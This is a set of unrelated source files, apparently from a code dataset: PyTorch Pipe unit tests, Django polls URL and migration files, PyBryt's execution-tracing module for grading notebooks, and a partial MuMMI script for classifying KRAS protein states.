self.fc_b = nn.Linear(1, 1)
def forward(self, a, b):
return (self.fc_a(a), self.fc_b(b))
model = nn.Sequential(Two())
model = Pipe(model, chunks=2)
a = torch.rand(10, 1, requires_grad=True)
b = torch.rand(10, 1, requires_grad=True)
a_out, b_out = model(a, b).local_value()
loss = (a_out + b_out).mean()
loss.backward()
assert a.grad is not None
assert b.grad is not None
def test_multi_sequence_input(setup_rpc):
class MultiSeq(nn.Module):
def forward(self, tup1, tup2):
return tup1, tup2
model = Pipe(nn.Sequential(MultiSeq()))
with pytest.raises(TypeError):
model(
[torch.rand(10), torch.rand(10)],
[torch.rand(10), torch.rand(10)]
)
def test_input_singleton(setup_rpc):
class One(nn.Module):
def __init__(self):
super().__init__()
self.fc = nn.Linear(1, 1)
def forward(self, a):
return (self.fc(a),)
model = nn.Sequential(One())
model = Pipe(model, chunks=2)
a = torch.rand(10, 1, requires_grad=True)
(a_out,) = model(a).local_value()
loss = a_out.mean()
loss.backward()
assert all(p.grad is not None for p in model.parameters())
assert a.grad is not None
def test_input_varargs(setup_rpc):
model = nn.Sequential(nn.Linear(1, 1))
model = Pipe(model)
a = torch.rand(1)
b = torch.rand(1)
# TypeError: forward() takes 2 positional arguments but 3 were given
with pytest.raises(TypeError):
model(a, b)
def test_non_tensor(setup_rpc):
class NonTensor(nn.Module):
def forward(self, _):
return "hello"
model = nn.Sequential(NonTensor())
model = Pipe(model)
x = torch.rand(1)
with pytest.raises(TypeError):
model(x)
with pytest.raises(TypeError):
model("hello")
def test_non_tensor_sequence(setup_rpc):
class NonTensorTuple(nn.Module):
def forward(self, x):
return (x, "hello")
class NonTensorArgs(nn.Module):
def forward(self, x: str, y: bool):
return x, y
model = nn.Sequential(NonTensorTuple())
model = Pipe(model)
x = torch.rand(1)
with pytest.raises(TypeError):
model((x, "hello"))
with pytest.raises(TypeError):
model([x, "hello"])
model = nn.Sequential(NonTensorArgs())
model = Pipe(model)
with pytest.raises(TypeError):
# Need at least one Tensor.
model("hello", True)
@pytest.mark.parametrize("checkpoint", ["never", "always", "except_last"])
def test_valid_non_tensor(checkpoint, setup_rpc):
class NonTensor1(nn.Module):
def forward(self, a: int, b: Tensor, c: bool, d: Tensor):
res = b + a if c else b * a
if d is not None:
res += d
return res, c, a, b, "hello", d
class NonTensor2(nn.Module):
def forward(self, a: Tensor, b: bool, c: int, d: Tensor, e: str, f: Tensor):
res = a * c if b else a + c
res += d
return c, res, a, d + f if f is not None else d, b, e, f
model = Pipe(nn.Sequential(NonTensor1(), NonTensor2()), chunks=5, checkpoint=checkpoint)
a = random.randint(0, 10)
b = torch.rand(10, 10)
c = random.randint(0, 1) == 0
d = torch.rand(10, 10)
res = model(a, b, c, d).local_value()
assert 7 == len(res)
assert [a] * 5 == res[0]
if c:
assert torch.allclose(((b + a + d) * a) + b, res[1])
assert torch.allclose(b + a + d, res[2])
else:
assert torch.allclose(((b * a) + d + a) + b, res[1])
assert torch.allclose(b * a + d, res[2])
assert torch.allclose(b + d, res[3])
assert [c] * 5 == res[4]
assert ["hello"] * 5 == res[5]
assert torch.allclose(d, res[6])
# Test one of the tensors can be None
res = model(a, b, c, None).local_value()
assert 7 == len(res)
assert [a] * 5 == res[0]
if c:
assert torch.allclose(((b + a) * a) + b, res[1])
assert torch.allclose(b + a, res[2])
else:
assert torch.allclose(((b * a) + a) + b, res[1])
assert torch.allclose(b * a, res[2])
assert torch.allclose(b, res[3])
assert [c] * 5 == res[4]
assert ["hello"] * 5 == res[5]
assert [None] * 5 == res[6]
# Need at least one tensor.
with pytest.raises(TypeError):
model(a, None, c, None)
@pytest.mark.parametrize("checkpoint", ["never", "always", "except_last"])
def test_no_tensor_output(checkpoint, setup_rpc):
class Model1(nn.Module):
def forward(self, a: int, b: Tensor, c: bool):
return a, c, "hello"
class Model2(nn.Module):
def forward(self, a: int, b: bool, c: str):
return a, c, b
model = Pipe(nn.Sequential(Model1(), Model2()), chunks=5)
a = random.randint(0, 10)
b = torch.rand(10, 10)
c = random.randint(0, 1) == 0
# Need at least one tensor across partitions too.
with pytest.raises(TypeError):
res = model(a, b, c).local_value()
@pytest.mark.parametrize("checkpoint", ["never", "always", "except_last"])
def test_uneven_batch_size(checkpoint, setup_rpc):
class Model(nn.Module):
def forward(self, a: Tensor, b: int, c: Tensor):
return a, b, c
model = Pipe(nn.Sequential(Model()), checkpoint=checkpoint, chunks=5)
a = torch.rand(3, 10)
b = random.randint(0, 10)
c = torch.rand(6, 10)
res = model(a, b, c).local_value()
assert torch.allclose(a, res[0])
assert [b] * 3 == res[1] # 3 chunks
assert torch.allclose(c, res[2])
# Two tensors producing uneven chunks would fail.
model = Pipe(nn.Sequential(Model()), checkpoint=checkpoint, chunks=5)
a = torch.rand(3, 10)
b = random.randint(0, 10)
c = torch.rand(4, 10)
with pytest.raises(RuntimeError, match='Found different number of chunks'):
model(a, b, c)
@pytest.mark.parametrize("checkpoint", ["never", "always", "except_last"])
def test_no_chunk(checkpoint, setup_rpc):
class Model(nn.Module):
def forward(self, a: Tensor, b: int, c: Tensor):
return a, b, c
model = Pipe(nn.Sequential(Model()), checkpoint=checkpoint, chunks=5)
a = torch.rand(10, 10)
b = random.randint(0, 10)
c = torch.rand(10, 10)
res = model(a, b, NoChunk(c)).local_value()
assert torch.allclose(a, res[0])
assert [b] * 5 == res[1]
# c gets replicated due to NoChunk and the same tensor gets concatenated 5
# times in the output.
assert torch.allclose(torch.cat((c, c, c, c, c)), res[2])
# Test invalid type for NoChunk
with pytest.raises(TypeError, match='NoChunk only supported for tensors'):
NoChunk(b)
@pytest.mark.parametrize("checkpoint", ["never", "always", "except_last"])
def test_deferred_batch_norm(checkpoint, setup_rpc):
bn = nn.BatchNorm2d(3)
pipe_bn = deepcopy(bn)
pipe = Pipe(
nn.Sequential(pipe_bn), chunks=2, checkpoint=checkpoint, deferred_batch_norm=True
)
x = torch.rand(4, 3, 10, 10)
pipe(x).local_value().mean().backward()
bn(x).mean().backward()
assert torch.allclose(pipe[0].running_mean, bn.running_mean, atol=1e-4)
assert torch.allclose(pipe[0].running_var, bn.running_var, atol=1e-4)
@pytest.mark.parametrize("checkpoint", ["never", "always"])
def test_deferred_batch_norm_params(checkpoint, setup_rpc):
bn = nn.BatchNorm2d(3)
pipe_bn = deepcopy(bn)
pipe = Pipe(
nn.Sequential(pipe_bn), chunks=1, checkpoint=checkpoint, deferred_batch_norm=True
)
x = torch.rand(4, 3, 10, 10)
pipe(x).local_value().mean().backward()
bn(x).mean().backward()
assert pipe[0].weight.grad is not None
assert pipe[0].bias.grad is not None
assert torch.allclose(pipe[0].weight.grad, bn.weight.grad, atol=1e-4)
assert torch.allclose(pipe[0].bias.grad, bn.bias.grad, atol=1e-4)
def test_devices(setup_rpc):
a = nn.Linear(1, 1)
b = nn.Linear(1, 1)
c = nn.Linear(1, 1)
# There are extra two devices.
model = nn.Sequential(a, b, c)
model = Pipe(model)
cpu = torch.device("cpu")
# Extra devices must be discarded.
assert model.devices == [cpu, cpu, cpu]
def test_partitions(setup_rpc):
a = nn.Linear(1, 1)
b = nn.Linear(1, 1)
model = nn.Sequential(a, b)
model = Pipe(model)
assert isinstance(model.partitions, nn.ModuleList)
assert isinstance(model.partitions[0], nn.Sequential)
assert isinstance(model.partitions[1], nn.Sequential)
assert "partitions.0.0.weight" in model.state_dict()
@pytest.mark.skipif(not torch.cuda.is_available(), reason="cuda required")
def test_merged_partitions(setup_rpc):
a = nn.Linear(1, 1).to(0)
b = nn.Sequential(nn.Linear(1, 1), nn.Linear(1, 2)).to(0)
c = nn.Linear(1, 1)
d = nn.Linear(1, 2)
model = nn.Sequential(a, b, c, d)
model = Pipe(model)
assert isinstance(model.partitions, nn.ModuleList)
assert isinstance(model.partitions[0], PipeSequential)
assert isinstance(model.partitions[1], PipeSequential)
assert list(model.partitions[0]) == [a, b[0], b[1]]
assert list(model.partitions[1]) == [c]
assert list(model.partitions[2]) == [d]
def test_deny_moving(setup_rpc):
a = nn.Linear(1, 1)
b = nn.Linear(1, 1)
model = nn.Sequential(a, b)
model = Pipe(model)
# Moving is denied.
with pytest.raises(TypeError):
model.cuda()
with pytest.raises(TypeError):
model.cpu()
with pytest.raises(TypeError):
model.to(torch.device("cuda"))
with pytest.raises(TypeError):
model.to(0)
with pytest.raises(TypeError):
model.to("cuda")
with pytest.raises(TypeError):
model.to(device=0)
with pytest.raises(TypeError):
model.to(torch.rand(1))
with pytest.raises(TypeError):
model.to(tensor=torch.rand(1))
# Casting is allowed.
model.half()
model.to(torch.double)
model.to(dtype=torch.float)
def test_empty_module(setup_rpc):
# Empty sequential module is not illegal.
model = nn.Sequential()
model = Pipe(model)
assert model(torch.tensor(42)).local_value() == torch.tensor(42)
# But only a tensor or a sequence of tensors is legal in Pipe.
with pytest.raises(TypeError):
model(42)
def test_named_children(setup_rpc):
a = nn.Linear(1, 1)
b = nn.Linear(1, 1)
model = nn.Sequential(OrderedDict([("a", a), ("b", b)]))
model = Pipe(model)
names = set(n for n, _ in model.named_modules())
assert "partitions.0.0" in names
assert "partitions.1.0" in names
# Pipe doesn't support __getattr__. Unlike nn.Sequential, Pipe requires
# several methods in its namespace.
with pytest.raises(AttributeError):
model.a
def test_verify_module_non_sequential(setup_rpc):
with pytest.raises(TypeError, match="module must be nn.Sequential to be partitioned"):
Pipe(nn.Module())
def test_verify_module_duplicate_children(setup_rpc):
conv = nn.Conv2d(3, 3, 1)
model = nn.Sequential(conv, conv)
with pytest.raises(ValueError, match="module with duplicate children is not supported"):
Pipe(model)
@skip_if_no_cuda
def test_verify_module_params_on_same_device(setup_rpc):
class Surrogate(nn.Module):
def __init__(self, param1, param2):
super().__init__()
self.param1 = param1
self.param2 = param2
conv1 = nn.Conv2d(3, 3, 1)
conv2 = nn.Conv2d(3, 3, 1)
model = nn.Sequential(Surrogate(conv1, conv2.cuda()))
with pytest.raises(
ValueError,
match=r'should have all parameters on a single device, please use .to\(\)'
' to place the module on a single device'):
Pipe(model)
@skip_if_no_cuda
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason="Need atleast two GPUs")
def test_verify_nested_modules(setup_rpc):
model = nn.Sequential(
nn.Sequential(
nn.Linear(32, 16).cuda(0),
nn.Linear(16, 8).cuda(0)
),
nn.Sequential(
nn.Linear(8, 4).cuda(1),
nn.Linear(4, 2).cuda(1)
),
)
pipe = Pipe(model)
out = pipe(torch.rand(10, 32).cuda(0))
assert out.local_value().device == torch.device("cuda:1")
assert out.local_value().size() == torch.Size([10, 2])
def test_verify_module_duplicate_parameters_on_same_device(setup_rpc):
class Surrogate(nn.Module):
def __init__(self, module):
super().__init__()
self.module = module
conv = nn.Conv2d(3, 3, 1)
model = nn.Sequential(Surrogate(conv), Surrogate(conv))
Pipe(model)
def test_forward_lockstep(setup_rpc):
timeline = []
class DelayedLog(nn.Module):
def __init__(self, j, seconds):
super().__init__()
self.i = 0
self.j = j
self.seconds = seconds
def forward(self, x):
time.sleep(self.seconds)
timeline.append((self.i, self.j))
self.i += 1
return x
model = nn.Sequential(DelayedLog(0, seconds=0), DelayedLog(1, seconds=0.1))
model = Pipe(model, chunks=3)
model(torch.rand(3, 1))
# Expected timeline: (Logs are recorded at !)
#
# Partition #0: 0! 1! 2!
# Partition #1: 000! 111! 222!
#
assert timeline == [(0, 0), (1, 0), (0, 1), (2, 0), (1, 1), (2, 1)]
@pytest.mark.parametrize("checkpoint", ["never", "always", "except_last"])
@skip_if_no_cuda
def test_multiple_inputs(checkpoint, setup_rpc):
class Module1(nn.Module):
def forward(self, a, b, c):
return a + b + c, a * b * c
class Module2(nn.Module):
def forward(self, a, b):
return a + b
model = Pipe(nn.Sequential(Module1().cuda(0), Module2().cuda(0)), chunks=2, checkpoint=checkpoint)
t = torch.rand(10)
res = model(t, t, t).local_value()
assert torch.equal(res, (t + t + t) + (t * t * t))
@skip_if_no_cuda
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason="Need atleast two GPUs")
def test_inputs_wrong_device(setup_rpc):
class Module1(nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(5))
def forward(self, a, b):
return a + b + self.param, b
# Start inputs on the wrong device and check that Pipe rejects them.
a = torch.rand(10).cuda(1)
b = torch.rand(10).cuda(1)
model = Pipe(nn.Sequential(Module1().cuda(0), Module1().cuda(1)), chunks=2)
with pytest.raises(ValueError, match='All inputs should be on the same device as the first partition'):
model(a, b)
@skip_if_no_cuda
@pytest.mark.skipif(torch.cuda.device_count() < 2, reason="Need atleast two GPUs")
def test_with_device_wrapper(setup_rpc):
fc1 = nn.Linear(16, 8).cuda(0)
fc2 = nn.Linear(8, 4).cuda(1)
dropout = nn.Dropout()
model = nn.Sequential(fc1, fc2, WithDevice(dropout, 'cuda:1'))
model = Pipe(model, chunks=8)
assert torch.device('cuda:1') == model(torch.rand(16, 16).cuda(0)).local_value().device
assert [torch.device('cuda:0'), torch.device('cuda:1')] == model.devices
model = nn.Sequential(fc1, WithDevice(dropout, 'cuda:1'))
model = Pipe(model, chunks=8)
assert torch.device('cuda:1') == model(torch.rand(16, 16).cuda(0)).local_value().device
assert [torch.device('cuda:0'), torch.device('cuda:1')] == model.devices
model = nn.Sequential(fc1, WithDevice(fc2, 'cuda:0'))
model = Pipe(model, chunks=8)
assert torch.device('cuda:0') == model(torch.rand(16, 16).cuda(0)).local_value().device
assert [torch.device('cuda:0')] == model.devices
assert torch.device('cuda:0') == fc2.weight.device
|
StarcoderdataPython
|
1618290
|
from django.urls import path
from . import views
from . import apiviews
app_name = 'polls'
urlpatterns = [
path('', views.IndexView.as_view(), name='index'),
path('<int:pk>/', views.DetailView.as_view(), name='detail'),
path('<int:pk>/results/', views.ResultsView.as_view(), name='results'),
path('<int:question_id>/vote/', views.vote, name='vote'),
path('api/questions/', apiviews.QuestionList.as_view(), name='question_list'),
path('api/questions/<int:pk>/', apiviews.QuestionDetail.as_view(), name='question_detail'),
path('api/choices/', apiviews.ChoiceList.as_view(), name='choice_list'),
path('api/choices/<int:pk>/', apiviews.ChoiceDetail.as_view(), name='choice_detail'),
]
|
StarcoderdataPython
|
3233398
|
# Generated by Django 3.2.8 on 2022-01-29 13:18
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Organisatie',
fields=[
('nummer', models.IntegerField(primary_key=True, serialize=False, unique=True, validators=[django.core.validators.MinValueValidator(10000000), django.core.validators.MaxValueValidator(99999999)])),
('naam', models.CharField(max_length=30, unique=True)),
],
options={
'ordering': ['-naam'],
},
),
]
|
StarcoderdataPython
|
164704
|
<reponame>JoshZero87/site<filename>contacts/forms.py<gh_stars>1-10
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django import forms
class PhoneOptOutUploadForm(forms.Form):
csv_file = forms.FileField()
|
StarcoderdataPython
|
4806332
|
"""Tracing function and controls"""
import inspect
import linecache
import re
from copy import copy
from types import FrameType, FunctionType, ModuleType
from typing import Any, Dict, List, Optional, Tuple, Callable
from .complexity import is_complexity_tracing_enabled
from .memory_footprint import MemoryFootprint
from .utils import is_ipython_frame
from ..utils import make_secret, pickle_and_hash, UnpicklableError
ACTIVE_FOOTPRINT = None
TRACING_FUNC = None
TRACING_VARNAME = "__PYBRYT_TRACING__"
def create_collector(
skip_types: List[type] = [type, type(len), FunctionType],
addl_filenames: List[str] = [],
) -> Tuple[MemoryFootprint, Callable[[FrameType, str, Any], Callable]]:
"""
Creates a memory footprint to collect observed values and a trace function.
Any types in ``skip_types`` won't be tracked by the trace function. The trace function by
default only traces inside IPython but can be set to trace inside specific files using the
``addl_filenames`` argument, which should be a list of absolute paths to files that should also be
traced inside of.
Args:
skip_types (``list[type]``, optional): object types not to track
addl_filenames (``list[str]``, optional): filenames to trace inside of in addition to
IPython
Returns:
``tuple[MemoryFootprint, callable[[frame, str, object], callable]]``: the memory footprint
and the trace function
"""
global ACTIVE_FOOTPRINT
vars_not_found = {}
footprint = MemoryFootprint()
def track_value(val, seen_at=None):
"""
Tracks a value in ``footprint``. Checks that the value has not already been tracked by
pickling it, hashing the pickled object, and comparing the hash to those already
recorded. If pickling is unsuccessful, the value is not tracked.
Args:
val (``object``): the object to be tracked
seen_at (``int``, optional): an overriding step counter value
"""
try:
if hasattr(val, "__module__"):
footprint.add_imports(val.__module__.split(".")[0])
if type(val) in skip_types:
return
if isinstance(val, ModuleType):
footprint.add_imports(val.__name__.split(".")[0])
return
footprint.add_value(copy(val), seen_at)
# if something fails, don't track
except:
return
def track_call(frame):
"""
Tracks a call in ``calls`` as a tuple of ``(filename, function name)``.
Args:
frame (``types.FrameType``): the frame of the call
"""
footprint.add_call(frame.f_code.co_filename, frame.f_code.co_name)
# TODO: a way to track the cell of execution
def collect_intermidiate_results(frame: FrameType, event: str, arg: Any):
"""
Trace function for PyBryt.
"""
if is_ipython_frame(frame) or frame.f_code.co_filename in addl_filenames:
footprint.increment_counter() # increment student code step counter
if event == "call":
track_call(frame)
return collect_intermidiate_results
        # return if tracking is disabled by a complexity check
if is_complexity_tracing_enabled():
return collect_intermidiate_results
name = frame.f_code.co_filename + frame.f_code.co_name
if is_ipython_frame(frame) or frame.f_code.co_filename in addl_filenames:
if event == "line" or event == "return":
line = linecache.getline(frame.f_code.co_filename, frame.f_lineno)
tokens = set("".join(char if char.isalnum() or char == '_' else "\n" for char in line).split("\n"))
for t in "".join(char if char.isalnum() or char == '_' or char == '.' else "\n" for char in line).split("\n"):
tokens.add(t)
tokens = sorted(tokens) # sort for stable ordering
for t in tokens:
if "." in t:
try:
float(t) # prevent adding floats prematurely
continue
except ValueError:
pass
try:
val = eval(t, frame.f_globals, frame.f_locals)
track_value(val)
except:
pass
else:
if t in frame.f_locals:
val = frame.f_locals[t]
track_value(val)
elif t in frame.f_globals:
val = frame.f_globals[t]
track_value(val)
# for tracking the results of an assignment statement
m = re.match(r"^\s*(\w+)(\[[^\]]\]|(\.\w+)+)*\s=.*", line)
if m:
if name not in vars_not_found:
vars_not_found[name] = []
vars_not_found[name].append((m.group(1), footprint.counter.get_value()))
if event == "return":
track_value(arg)
elif (is_ipython_frame(frame) or frame.f_back.f_code.co_filename in addl_filenames) and \
event == "return":
track_value(arg)
if event == "return" and name in vars_not_found:
varnames = vars_not_found.pop(name)
for t, step in varnames:
if t in frame.f_locals:
val = frame.f_locals[t]
track_value(val, step)
elif t in frame.f_globals:
val = frame.f_globals[t]
track_value(val, step)
return collect_intermidiate_results
ACTIVE_FOOTPRINT = footprint
return footprint, collect_intermidiate_results
def get_tracing_frame():
"""
Returns the frame that is being traced by looking for the ``__PYBRYT_TRACING__`` global variable.
Returns:
        the frame being traced, or ``None`` if no tracing is occurring
"""
frame = inspect.currentframe()
while frame is not None:
if TRACING_VARNAME in frame.f_globals and frame.f_globals[TRACING_VARNAME]:
return frame
frame = frame.f_back
return None
def tracing_off(frame=None, save_func=True):
"""
Turns off PyBryt's tracing if tracing is occurring in this call stack. If PyBryt is not tracing,
takes no action.
This method can be used in students' notebooks to include code that shouldn't be traced as part
of the submission, e.g. demo code or ungraded code. In the example below, the call that creates
``x2`` is traced but the one to create ``x3`` is not.
.. code-block:: python
def pow(x, a):
return x ** a
x2 = pow(x, 2)
pybryt.tracing_off()
x3 = pow(x, 3)
"""
global TRACING_FUNC
frame = get_tracing_frame() if frame is None else frame
if frame is None:
return
if save_func:
TRACING_FUNC = frame.f_trace
vn = f"sys_{make_secret()}"
exec(f"import sys as {vn}\n{vn}.settrace(None)", frame.f_globals, frame.f_locals)
def tracing_on(frame=None, tracing_func=None):
"""
Turns tracing on if PyBryt was tracing the call stack. If PyBryt is not tracing or
:py:meth:`tracing_off<pybryt.tracing_off>` has not been called, no action is taken.
This method can be used in students' notebooks to turn tracing back on after deactivating tracing
    for ungraded code. In the example below, ``x4`` is traced because ``tracing_on`` is used after
``tracing_off`` and the creation of ``x3``.
.. code-block:: python
def pow(x, a):
return x ** a
x2 = pow(x, 2)
pybryt.tracing_off()
x3 = pow(x, 3)
pybryt.tracing_on()
x4 = pow(x, 4)
"""
global TRACING_FUNC
frame = get_tracing_frame() if frame is None else frame
if frame is None or (TRACING_FUNC is None and tracing_func is None):
return
if TRACING_FUNC is not None and tracing_func is None:
tracing_func = TRACING_FUNC
vn = f"cir_{make_secret()}"
vn2 = f"sys_{make_secret()}"
frame.f_globals[vn] = tracing_func
exec(f"import sys as {vn2}\n{vn2}.settrace({vn})", frame.f_globals, frame.f_locals)
frame.f_trace = tracing_func
class no_tracing:
"""
A context manager for turning tracing off for a block of code in a submission.
If PyBryt is tracing code, any code inside this context will not be traced for values in memory.
If PyBryt is not tracing, no action is taken.
.. code-block:: python
with pybryt.no_tracing():
# this code is not traced
foo(1)
# this code is traced
foo(2)
"""
def __enter__(self):
tracing_off()
def __exit__(self, exc_type, exc_value, traceback):
tracing_on()
return False
class FrameTracer:
"""
A class for managing the tracing of a call stack.
Args:
frame (``FrameType``): the frame to initialize tracing in
"""
footprint: Optional[MemoryFootprint]
"""the memory footprint being populated"""
frame: FrameType
"""the frame being traced"""
_tracing_already_enabled: bool
"""whether tracing was already enabled when ``start_trace`` was called"""
def __init__(self, frame: FrameType) -> None:
self.frame = frame
self.footprint = None
self._tracing_already_enabled = False
    def start_trace(self, **kwargs) -> bool:
"""
Create a collector and memory footprint and start tracing execution in the frame. Returns
a boolean indicating whether tracing was enabled.
Args:
**kwargs: additional keyword arguments passed to ``create_collector``
Returns:
``bool``: whether this call initiated tracing (``False`` if tracing was already enabled)
"""
self._tracing_already_enabled = get_tracing_frame() is not None
if self._tracing_already_enabled:
self.footprint = get_active_footprint()
return False
self.footprint, cir = create_collector(**kwargs)
self.frame.f_globals[TRACING_VARNAME] = True
tracing_on(tracing_func=cir)
return True
def end_trace(self) -> None:
"""
End execution tracing in the frame.
"""
if not self._tracing_already_enabled:
tracing_off(save_func=False)
self.frame.f_globals[TRACING_VARNAME] = False
def get_footprint(self) -> MemoryFootprint:
"""
Return the memory footprint that was populated by the trace function.
Returns:
:py:class:`pybryt.execution.memory_footprint.MemoryFootprint`: the memory footprint
"""
return self.footprint
def get_active_footprint() -> Optional[MemoryFootprint]:
"""
Get the active memory footprint if present, else ``None``.
Returns:
:py:class:`pybryt.execution.memory_footprint.MemoryFootprint`: the memory footprint
"""
return ACTIVE_FOOTPRINT
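# --- Illustrative usage sketch (not part of the original PyBryt source) ---------------
# A minimal example of how FrameTracer can be driven end-to-end, assuming it is created
# from the caller's own frame; the helper below is for demonstration only and is never
# invoked by this module.
def _example_frame_tracer_usage() -> MemoryFootprint:
    frame = inspect.currentframe()
    tracer = FrameTracer(frame)
    tracer.start_trace(addl_filenames=[__file__])  # also trace inside this file, not just IPython
    squares = [n ** 2 for n in range(5)]           # values observed here land in the footprint
    tracer.end_trace()
    return tracer.get_footprint()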
|
StarcoderdataPython
|
896
|
###############################################################################
# @todo add Pilot2-splash-app disclaimer
###############################################################################
""" Get's KRAS states """
import MDAnalysis as mda
from MDAnalysis.analysis import align
from MDAnalysis.lib.mdamath import make_whole
import os
import numpy as np
import math
############## Below section needs to be uncommented ############
import mummi_core
import mummi_ras
from mummi_core.utils import Naming
# # Logger has to be initialized the first thing in the script
from logging import getLogger
LOGGER = getLogger(__name__)
# # Initialize MuMMI if it has not been done before
# MUMMI_ROOT = mummi.init(True)
# This is needed so the Naming works below
#@TODO fix this so we don't have these on import; make them part of an init
mummi_core.init()
dirKRASStates = Naming.dir_res('states')
dirKRASStructures = Naming.dir_res('structures')
# #RAS_ONLY_macrostate = np.loadtxt(os.path.join(dirKRASStates, "RAS-ONLY.microstates.txt"))
RAS_ONLY_macrostate = np.loadtxt(os.path.join(dirKRASStates, "ras-states.txt"),comments='#')
# #RAS_RAF_macrostate = np.loadtxt(os.path.join(dirKRASStates, "RAS-RAF.microstates.txt"))
RAS_RAF_macrostate = np.loadtxt(os.path.join(dirKRASStates, "ras-raf-states.txt"),comments='#') # Note: different number of columns, so the indexing changes below
# TODO: CS, my edits to test
# RAS_ONLY_macrostate = np.loadtxt('ras-states.txt')
# RAS_RAF_macrostate = np.loadtxt('ras-raf-states.txt')
############## above section needs to be uncommented ############
# TODO: CS, my edits to test
# TODO: TSC, The reference structure has to currently be set as the 'RAS-ONLY-reference-structure.gro'
# TODO: TSC, path to the reference structure is: mummi_resources/structures/
kras_ref_universe = mda.Universe(os.path.join(dirKRASStructures, "RAS-ONLY-reference-structure.gro"))
# kras_ref_universe = mda.Universe("RAS-ONLY-reference-structure.gro")
# kras_ref_universe = mda.Universe('AA_pfpatch_000000004641_RAS_RAF2_411.gro')
# TODO: CS, not using these for x4 proteins; instead using protein_systems below to set num_res
######### Below hard codes the number of residues within RAS-only and RAS-RAF ##########
RAS_only_num_res = 184
RAS_RAF_num_res = 320
######### Above hard codes the number of residues within RAS-only and RAS-RAF ##########
####### This can be removed
# def get_kras(syst, kras_start):
# """Gets all atoms for a KRAS protein starting at 'kras_start'."""
# return syst.atoms[kras_start:kras_start+428]
####### This can be removed
def get_segids(u):
"""Identifies the list of segments within the system. Only needs to be called x1 time"""
segs = u.segments
segs = segs.segids
ras_segids = []
rasraf_segids = []
for i in range(len(segs)):
# print(segs[i])
if segs[i][-3:] == 'RAS':
ras_segids.append(segs[i])
if segs[i][-3:] == 'RAF':
rasraf_segids.append(segs[i])
return ras_segids, rasraf_segids
def get_protein_info(u,tag):
"""Uses the segments identified in get_segids to make a list of all proteins in the systems.\
Outputs a list of the first residue number of the protein, and whether it is 'RAS-ONLY', or 'RAS-RAF'.\
The 'tag' input defines what is used to identify the first residue of the protein. i.e. 'resname ACE1 and name BB'.\
Only needs to be called x1 time"""
ras_segids, rasraf_segids = get_segids(u)
if len(ras_segids) > 0:
RAS = u.select_atoms('segid '+ras_segids[0]+' and '+str(tag))
else:
RAS = []
if len(rasraf_segids) > 0:
RAF = u.select_atoms('segid '+rasraf_segids[0]+' and '+str(tag))
else:
RAF = []
protein_info = []#np.empty([len(RAS)+len(RAF),2])
for i in range(len(RAS)):
protein_info.append((RAS[i].resid,'RAS-ONLY'))
for i in range(len(RAF)):
protein_info.append((RAF[i].resid,'RAS-RAF'))
######## sort protein info
protein_info = sorted(protein_info)
######## sort protein info
return protein_info
def get_ref_kras():
"""Gets the reference KRAS struct. Only called x1 time when class is loaded"""
start_of_g_ref = kras_ref_universe.residues[0].resid
ref_selection = 'resid '+str(start_of_g_ref)+':'+str(start_of_g_ref+24)+' ' +\
str(start_of_g_ref+38)+':'+str(start_of_g_ref+54)+' ' +\
str(start_of_g_ref+67)+':'+str(start_of_g_ref+164)+' ' +\
'and (name CA or name BB)'
r2_26r40_56r69_166_ref = kras_ref_universe.select_atoms(str(ref_selection))
return kras_ref_universe.select_atoms(str(ref_selection)).positions - kras_ref_universe.select_atoms(str(ref_selection)).center_of_mass()
# Load initial ref frames (only need to do this once)
ref0 = get_ref_kras()
def getKRASstates(u,kras_indices):
"""Gets states for all KRAS proteins in path."""
# res_shift = 8
# all_glycine = u.select_atoms("resname GLY")
# kras_indices = []
# for i in range(0, len(all_glycine), 26):
# kras_indices.append(all_glycine[i].index)
########## Below is taken out of the function so it is only done once #########
# kras_indices = get_protein_info(u,'resname ACE1 and name BB')
########## Above is taken out of the function so it is only done once #########
# CS, for x4 cases:
# [{protein_x4: (protein_type, num_res)}]
protein_systems = [{'ras4a': ('RAS-ONLY', 185),
'ras4araf': ('RAS-RAF', 321),
'ras': ('RAS-ONLY', 184),
'rasraf': ('RAS-RAF', 320)}]
ALLOUT = []
for k in range(len(kras_indices)):
start_of_g = kras_indices[k][0]
protein_x4 = str(kras_indices[k][1])
try:
protein_type = [item[protein_x4] for item in protein_systems][0][0] # 'RAS-ONLY' OR 'RAS-RAF'
num_res = [item[protein_x4] for item in protein_systems][0][1]
except:
LOGGER.error('Check KRas naming between modules')
raise Exception('Error: unknown KRas name')
# TODO: CS, replacing this comment section with the above, to handle x4 protein types
# ---------------------------------------
# ALLOUT = []
# for k in range(len(kras_indices)):
# start_of_g = kras_indices[k][0]
# protein_type = str(kras_indices[k][1])
# ########## BELOW SECTION TO DETERMINE WHICH RESIDUES ARE PART OF THE PROTEIN GROUP - NEEDED FOR PBC REMOVAL ##############
# ########## POTENTIALLY REDO WITH A 'HARD-CODED' NUMBER OF RESIDUES PER PROTEIN GROUP (WHETHER RAS-ONLY OR RAS-RAF) #######
# ########## HAS BEEN REDONE WITH A 'HARD-CODED' NUMBER OF RESIDUES PER PROTEIN GROUP (WHETHER RAS-ONLY OR RAS-RAF) ########
# # if len(kras_indices) == 1:
# # krases0_BB = u.select_atoms('resid '+str(start_of_g)+':'+str(len(u.residues))+' and name BB') ####### HAS TO BE FIXED FOR BACKBONE ATOMS FOR SPECIFIC PROTEIN
# # elif len(kras_indices) > 1:
# # if k == len(kras_indices)-1:
# # krases0_BB = u.select_atoms('resid '+str(start_of_g)+':'+str(len(u.residues))+' and name BB')
# # else:
# # krases0_BB = u.select_atoms('resid '+str(start_of_g)+':'+str(kras_indices[k+1][0])+' and name BB')
# ########## ABOVE SECTION TO DETERMINE WHICH RESIDUES ARE PART OF THE PROTEIN GROUP - NEEDED FOR PBC REMOVAL ##############
#
# ########## Below hard codes the number of residues/beads in the RAS-ONLY and RAS-RAF simulations #########################
# if protein_type == 'RAS-ONLY':
# num_res = RAS_only_num_res
# elif protein_type == 'RAS-RAF':
# num_res = RAS_RAF_num_res
# ########## Above hard codes the number of residues/beads in the RAS-ONLY and RAS-RAF simulations #########################
# ---------------------------------------
# TODO: TSC, I changed the selection below, which can be used for the make_whole...
# krases0_BB = u.select_atoms('resid '+str(start_of_g)+':'+str(start_of_g+num_res)+' and (name CA or name BB)')
